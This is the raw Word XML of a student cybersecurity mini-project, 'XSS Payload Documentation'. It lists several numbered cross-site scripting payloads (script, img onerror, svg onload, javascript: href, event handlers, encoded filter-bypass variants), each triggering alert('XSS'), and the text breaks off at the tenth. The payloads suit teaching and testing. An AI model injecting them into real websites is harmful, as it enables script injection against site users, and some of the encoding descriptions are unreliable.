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84914" w14:textId="0AE7960B" w:rsidR="0045140A" w:rsidRDefault="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B58152" w14:textId="65668D3A" w:rsidR="0045140A" w:rsidRPr="00032F60" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00032F60">
        <w:rPr>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t xml:space="preserve">SURE TRUST </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0AD190" w14:textId="63020062" w:rsidR="0045140A" w:rsidRPr="00032F60" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00032F60">
        <w:rPr>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t>MINI PROJECT -</w:t>
      </w:r>
      <w:r w:rsidR="00E504A8">
        <w:rPr>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA1CAD8" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="00032F60" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33095545" w14:textId="392F1768" w:rsidR="0045140A" w:rsidRPr="00032F60" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00032F60">
        <w:rPr>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t>XSS PAYLOAD DOCUMENTATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0818FF54" w14:textId="77777777" w:rsidR="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="4207E307" w14:textId="77777777" w:rsidR="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="439D4F25" w14:textId="77777777" w:rsidR="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="04F222D9" w14:textId="77777777" w:rsidR="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="582FA198" w14:textId="77777777" w:rsidR="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="365717FD" w14:textId="77777777" w:rsidR="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="46402199" w14:textId="77777777" w:rsidR="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="2555B882" w14:textId="77777777" w:rsidR="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="64942978" w14:textId="77777777" w:rsidR="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="2307BD0F" w14:textId="77777777" w:rsidR="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="7AECA177" w14:textId="77777777" w:rsidR="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="62FB5B33" w14:textId="77777777" w:rsidR="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF8DA91" w14:textId="77777777" w:rsidR="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="5FE68EDD" w14:textId="099746D4" w:rsidR="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve">Guided </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>by :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                                            PRESENTED BY </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B039E3C" w14:textId="4FF829F4" w:rsidR="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Mr.Himaneesh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sir                                                                                                                                                   K.SAI JAYANTH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5680AFC6" w14:textId="77777777" w:rsidR="00AC02B2" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Sure</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Trust Organisation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DA377E" w14:textId="0CC401AB" w:rsidR="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t>Cyber Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7173D4B2" w14:textId="604B8DF9" w:rsidR="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A55DF9D" w14:textId="77777777" w:rsidR="00032F60" w:rsidRDefault="00032F60">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8CF568" w14:textId="77777777" w:rsidR="00032F60" w:rsidRDefault="00032F60">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="153261E9" w14:textId="77777777" w:rsidR="00032F60" w:rsidRDefault="00032F60">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366CE706" w14:textId="06AF7BF0" w:rsidR="0045140A" w:rsidRDefault="0045140A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>INTRODUCTION                                                                             PAGE NO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632302B5" w14:textId="10DF6225" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.XSS PAYLOADS                                                                             PAGE NO -1 TO PAGE NO 4                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584030B8" w14:textId="77777777" w:rsidR="0045140A" w:rsidRDefault="0045140A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF6C200" w14:textId="77777777" w:rsidR="005A6E5C" w:rsidRPr="0045140A" w:rsidRDefault="005A6E5C"/>
    <w:p w14:paraId="1B3AD460" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A"/>
    <w:p w14:paraId="04989DF8" w14:textId="64067950" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Basic Payload</w:t>
      </w:r>
      <w:r w:rsidRPr="0045140A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4BF1E9" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188C5C20" w14:textId="045DB7C6" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB7015A" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>&lt;script&gt;alert('XSS</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>');&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BBCFB6" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>This is a straightforward XSS payload using a &lt;script&gt; tag to generate an alert box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1C2FD1" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A632F54" w14:textId="3E1D83A7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2.Image Tag Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAA5349" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674A0BA8" w14:textId="3DF7DC12" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAE1ADA" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve">=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>=alert('XSS')&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1848E97A" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve">An XSS payload using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve"> attribute of an &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve">&gt; tag to trigger the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>) function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E2B26E" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="4A6E49BB" w14:textId="05953A62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3.Event Handler Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D325641" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F23F645" w14:textId="4C38B097" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AB9C2B" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>&lt;button onclick="alert('XSS')"&gt;Click me&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F92F510" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>Demonstrates XSS through an onclick event handler within a &lt;button&gt; tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D03FAE" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="6727BA05" w14:textId="5A40DFF6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4.Input Tag Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E85E43B" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41915851" w14:textId="6DC98764" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF5EDB2" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>&lt;input type="text" value="&lt;script&gt;alert('XSS</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>')&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ACB071" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>Injects a script into the value attribute of an &lt;input&gt; tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F98C62" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="078B6153" w14:textId="0033B12E" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.Div Tag Payload</w:t>
      </w:r>
      <w:r w:rsidRPr="0045140A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F59DF9C" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E443A8" w14:textId="1ADC2954" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="710451A7" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve">&lt;div </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>onmouseover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>="alert('XSS')"&gt;Hover over me&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBD7AC3" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve">Uses the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>onmouseover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve"> attribute in a &lt;div&gt; tag to execute JavaScript when hovered over.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791B77DB" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="31BF22CD" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="774972D3" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="2DD217C7" w14:textId="3A4A5C85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6.Anchor Tag Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1E16A7" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F57B526" w14:textId="680313B4" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CD3A4A" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve">&lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>('XSS')"&gt;Click here&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3641E74D" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve">Attempts to execute JavaScript through the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve"> attribute of an &lt;a&gt; tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19533437" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="2806E126" w14:textId="1E36BF88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7.SVG Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFD0DAF" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6302AE84" w14:textId="02E22679" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EDE3C7" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>/onload=alert('XSS')&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594843B9" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>Utilizes an &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve">&gt; tag's onload attribute to trigger the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>) function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445B08EB" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="7371EABF" w14:textId="04048C75" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8.Unicode Obfuscation Payload</w:t>
      </w:r>
      <w:r w:rsidRPr="0045140A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79824172" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1515B278" w14:textId="1E167948" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6C6967" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>&lt;s&amp;#x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>63;ript</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66147D04" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>Uses Unicode encoding to obfuscate the &lt;script&gt; tag to bypass simple filters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0CF22C" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="7AB35527" w14:textId="6B141060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9.Hex Encoding Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62649C59" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CEDC8C" w14:textId="723788D7" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EFB502" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>scri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>&amp;#x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>70;t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FFF8E1" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>Similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t xml:space="preserve"> Unicode, uses hexadecimal encoding to obfuscate the &lt;script&gt; tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FB7978" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A"/>
    <w:p w14:paraId="286FF778" w14:textId="43D65B20" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.Double Encoding Payload</w:t>
      </w:r>
      <w:r w:rsidRPr="0045140A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E8B566" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1883E4CC" w14:textId="564AC346" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ED1850" w14:textId="77777777" w:rsidR="0045140A" w:rsidRPr="0045140A" w:rsidRDefault="0045140A" w:rsidP="0045140A">
      <w:r w:rsidRPr="0045140A">
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>lt;script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>&amp;gt;alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>('XSS')&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>script&amp;gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0045140A">
        <w:t>;</w:t>
      </w:r>
